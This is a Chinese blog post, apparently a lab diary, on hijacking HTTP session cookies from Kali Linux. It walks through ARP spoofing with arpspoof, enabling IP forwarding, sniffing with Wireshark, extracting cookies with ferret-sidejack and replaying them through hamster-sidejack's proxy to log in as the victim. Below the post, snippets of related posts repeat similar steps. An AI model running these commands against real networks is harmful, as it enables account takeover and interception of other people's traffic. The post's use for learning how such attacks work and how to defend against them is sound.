kali实现Cookie会话劫持

已于 2023-03-01 14:27:54 修改
阅读量707 收藏 7
点赞数
分类专栏: 中间人攻击 计算机网络安全学习日记 文章标签: 服务器 网络 linux
于 2023-02-28 17:37:43 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45971758/article/details/129266373
版权

会话劫持

Session side jacking是会话劫持(session hijacking)的一种。
渗透测试人员通过嗅探客户端和服务器之间的数据,获取会话的cookie。然后利用该cookie,以该cookie的所有者身份访问服务器,以获得相应的数据。
Kali Linux提供对应的工具hamster-sidejack。该工具把提取cookie和利用cookie整合在一起,简化渗透测试人员的操作。渗透测试人员只需要通过中间人攻击截取流量,然后设置HTTP代理,就可以在本机浏览器中获取cookie,并直接利用。

实验操作

  1. 下载arpspoof
 apt install arpspoof
  1. 安装攻击工具ferret-sidejack与hamster-sidejack。
dpkg --add-architecture i386 
apt-get update

apt-get install ferret-sidejack:i386
apt-get install  hamster-sidejack
  1. 劫持用户的登录信息cookies工具 hamster-sidejack。
开启kali路由转发功能
echo 1 > /proc/sys/net/ipv4/ip_forward 
双向ARP 进行中间人攻击
arpspoof -i eth0 -t 192.168.213.2 192.168.213.131 -r 
  1. 开启wireshark

在目标主机上登录相对应的网站,尽量选择安全性较低的,登录要留存过程 ,多刷新几次产生流量。
以本人超星账号为例,因为超星学习通的网站使用的协议为HTTP 协议,

arpspoof -i eth0  -t 192.168.213.131 192.168.213.2 -r
            网卡         目标主机        内网网关

image.png

  1. ferret-sidejack分析WireShark抓取到的含有HTTP数据包,分析出明文传输的Cookie值,获取到制定网站的Cookie值后,并生成hamster.txt

image.pngimage.png

  1. 使用Hamster-sidejack在hamster.txt同一目录下运行,hamster-sidejack 启动代理端口。image.png
  2. 配置浏览器代理为127.0.0.1 : 1234
    浏览器配置代理
  3. 使用kali自带浏览器登录hamster生成的代理网址,示例使用的是127.0.0.1:1234。

image.png

  1. 登录网址成功后,会显示拦截的目标主机,点击进去会有拦截到的HTTP网址列表,里面都是网址对应的cookie值。

image.png9. 直接点击网址即可登录。
image.png

总结

HTTP的cookie使用工具可以分析得到,但是无法分析到HTTPS的cookie,
接下来会更新HTTPS的工作原理。

Adm8n
关注
  • 0
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Cookie获取实验总出错,Hamster,Ferret工具遇到错误?这篇文章一次全搞定!
qq_39616910的博客
04-12 2397
1工具准备 中间人攻击获取cookie登陆他人账号,需要工具: 1.1arpspoof 用于中间人攻击,ARP欺骗 1.2ferret 用于重写生成后的抓包文件 该工具安装方 实验使用2017年64位kali,没有安装ferret工具,首先要进行安装 1.2.1添加对32位的支持 dpkg --add-architecture i386 1.2.2 更新源 apt-get c...
会话劫持 Kali
05-05 2214
1.工具介绍 网络数据包信息收集工具ferret-sidejack 网络数据包传递用户的各种操作和对应的信息。但是由于各种数据混在一起,不利于渗透测试人员分析。Kali Linux提供了一款信息搜集工具ferret-sidejack。该工具既可以从网络接口直接读取数据,也可以读取数据抓包文件。该工具会过滤掉大部分格式性数据,只保留更为有价值的数据,如IP地址、Mac地址、主机名、操作类型...
基于HTTP 无状态特征的cookies劫持实验
weixin_50340347的博客
03-01 306
HTTP cookies劫持: 首先保证虚拟机中的kali系统能够和外部网络通信,打开编辑-----虚拟网络编辑器器—更改设置----桥接无线网卡模式。 左键单击虚拟机----设置-----网络适配器----选择桥接模式-----确定。 在kali中将网络设置改为自动(DHCP):设置—Advanced Network Confiquration—以太网连接1—IPV4----自动DHCP。 然后检查我们的虚拟机是不是能够连接上网络,可以通过ping www.baidu.com 进行检查,以下截图表示我们
kali下arp欺骗session会话劫持
赵一舟的博客
02-08 4237
基于arp欺骗的session劫持 开启ettercap arp监听后 开启打开一个终端,输入driftnet -i wlan0 测试下arp欺骗正常没 TcpDump可以将网络中传送的数据包完全截获下来提供分析 捕获数据包命令,重新开启命令行 tcpdump -i wlan0 -w text1.cap 让受害者打开个邮箱或者微博等,登陆成功后停止tcpdump,然后在
Kali Linux 实现Cookie会话劫持
bomb324的博客
09-05 1732
一.环境搭建 Tips: 使用Kali Linux,下列工具中只需要下载ferret即可,其它工具均默认安装 1.下载arpspoof apt install dsniff 2.下载ferret 软件介绍: 网络数据包传递用户的各种操作和对应的信息。但是由于各种数据混在一起,不利于渗透测试人员分析。Kali Linux提供了一款信息搜集工具ferret-sidejack。该工具既可以从网络接口直接读取数据,也可以读取数据抓包文件。该工具会过滤掉大部分格式性数据,只保留更为有价值的数据,如IP地址、Mac
(原创)kali linux劫持百度和QQ空间cookie
"黑色键盘's Bolg"
12-25 1479
链接:http://pan.baidu.com/s/1nt1GCbR 密码:dets
Kali Linux系列之cookie抓取
微信公众号:码奋
04-13 2784
​ (你的世界是个什么样的世界?你说,我们倾听!) ----------------- cookie包抓取 小百科 Cookie,有时也用其复数形式Cookies,指某些网站为了辨别用户身份、进行session跟踪而储存在用户本地终端上的数据(通常经过加密)。定义于RFC2109和2965中的都已废弃,最新取代的规范是RFC6265[1]。(可以叫做浏览器缓存)...
E022-渗透测试常用工具-使用ferret进行Cookie劫持.pdf
12-02
E022-渗透测试常用工具-使用ferret进行Cookie劫持
ensp加kali实现arp欺骗攻击
04-21
本文将深入探讨如何使用Kali Linux这一专业安全操作系统,配合ENSPI(Ethernet Network Simulation Platform,以太网网络模拟平台)来实现ARP欺骗攻击,并了解这种攻击可能导致的后果。 首先,我们需要理解ARP的...
使用kali linux实现arp欺骗
最新发布
04-17
小黑子技术和防御方法
会话劫持攻击实战祥解
04-08
大家所说的入侵,都是针对一台主机,在获得管理员权限后,就很是得意;其实,真正的入侵是占领整个内部网络。针对内部网络的攻击方法比较多,但比较有效的方法非ARP欺骗、DNS欺骗莫属了。但是,不管使用什么技术,无非都是抓取目标的数据包,然后分析出敏感数据。如果目标内部采用的是共享式网络(采用HUB集线器连网),那只需要把网卡设置为“混杂模式”,挂上嗅探器(Sniffer),就能简听到你想得到的数据。如果是交换式网络(采用交换机连网),这样方法就行不通了,因为对于嗅探器,有三种网络环境是无法跨越的:“网桥”、“交换机”、“路由器”。可惜,对于ARP欺骗,交换式网络还是无能为力,如果我们借助ARP欺骗,在实现更高一层的“入侵手段”,从而真正的控制内部网络。这也就是本文要叙述的会话劫持攻击
中间人攻击之Cookie
03-24
当涉及到MITM攻击和Cookie时,攻击者通常会利用公共Wi-Fi、网络嗅探工具(如Kali Linux中的Wireshark)或者恶意软件来拦截网络流量。一旦捕获到包含Cookie的数据包,攻击者就可以复用这些Cookie,登录受害者的账户,...
kali 1800W超强字典
04-07
kali 1800W超强字典
Kali安装burpsuite专业版
04-03
Kali安装burpsuite专业版
中间人攻击劫持cookie
ChenD的学习笔记
10-26 980
中间人攻击劫持cookie
kali linux中使用ferret进行cookies劫持攻击
weixin_43996007的博客
01-17 3532
kali linux中使用ferret进行cookies劫持攻击 首先将kali linux的网卡模式设置为“仅主机模式”,使其共享物理主机的网络,并且可以上外网。 在kali中,开启数据转发功能,并查看当前的ip地址。 使用nmap或者zenmap扫描局域网内的主机,确定攻击目标 使用arpspoof命令冒充网关 arpspoof -i eth0 -t 网关 目标主机 ...
【MITM】登陆会话劫持
Night May Say
05-15 3187
中间人攻击(Man-in-the-MiddleAttack,简称“MITM攻击”)是一种“间接”的入侵攻击,这种攻击模式是通过各种技术手段将受入侵者控制的一台计算机虚拟放置在网络连接中的两台通信计算机之间,这台计算机就称为“中间人”。 本文所讨论的攻击方法仅供技术交流,禁止违法使用工具kali: arpspoof:arp欺骗 tcpdump:dump数据包 Ferret:处理数据包 Hamster
Linux-Kali下抓取cookie笔记 往事如风~
weixin_36135166的博客
05-03 1027
Linux-Kali下抓取cookie笔记 首先给大家说下 这个也属于传统中间人攻击,由于中间人攻击可以使用多种方法,就不一一说了,这里只介绍 利用kali下工具来劫持cookie信息。1 首先kali要连接到这个网络 可以用ifconfig 查看IP地址是否获取,可以ping www.baidu.com 来检测设备的连通性。(eth0就是你第一个网网卡 loopback是本地环回地址)2 如果不...
理解xss-劫持会话
高野02blog
11-24 2969
xss-劫持会话攻击实验 Step01: 搭建好攻击者的Web服务器(LAMP或LNMP平台,phpstudy) http://192.168.195.127/cookie.php 验证PHP环境 (1)看端口 Web:80 mysql:3306 php:9000 (2)验证PHP文件能不能正常解析 网站的根目录 c:\phpstudy_pro\www 创建一个test.php文件 <?php phpinfo() ?> Step02:在攻击者的Web服务器的网站根目录下创建cookie.php
ARPflood的kali实现
04-04
ARPflood是一种网络攻击技术,它利用ARP协议的漏洞来发送大量的ARP请求,从而导致网络拥塞或者服务不可用。在Kali Linux中,可以使用工具来实现ARPflood攻击。 一种常用的工具是arpspoof,它是dsniff套件的一部分。首先,确保你已经安装了dsniff套件。可以使用以下命令来安装: ``` sudo apt-get install dsniff ``` 安装完成后,可以使用以下命令来进行ARPflood攻击: ``` sudo arpspoof -i <interface> -t <target IP> <gateway IP> ``` 其中,`<interface>`是你的网络接口名称,可以使用`ifconfig`命令查看。`<target IP>`是攻击目标的IP地址,`<gateway IP>`是网关的IP地址。 执行以上命令后,arpspoof会发送大量的ARP请求给目标主机和网关,从而导致网络拥塞或者服务不可用。 需要注意的是,进行ARPflood攻击是非法的,并且可能会对网络造成严重影响。请确保你在合法授权和合法测试环境下使用这些工具。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值